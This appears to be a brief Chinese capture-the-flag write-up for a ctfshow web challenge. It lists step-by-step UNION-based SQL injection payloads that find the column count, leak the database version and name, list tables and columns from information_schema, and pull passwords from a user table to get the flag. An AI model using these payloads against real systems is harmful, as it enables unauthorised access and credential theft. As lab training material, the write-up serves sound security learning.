1.id=1’报错
2.id=1′–+正常回显
3.id=1′ order by 3–+正常回显
4.id=1′ order by 4–+报错
5.id=1′ union select 1,2,3–+测回显点都正常
6.id=1′ union select version(),database(),3–+爆出版本和数据库
7.id=1′ union select table_name,2,3 from information_schema.tables where table_schema=’ctfshow_web’–+(爆表名)
8.id=1′ union select column_name,2,3 from information_schema.columns where table_name=’ctfshow_user3′ and table_schema=’ctfshow_web’–+(爆列名)
9.id=1′ union select 1,2,password from ctfshow_user3–+(取数据)得到flag
注:本题过滤flag,所以只查password即可
发表回复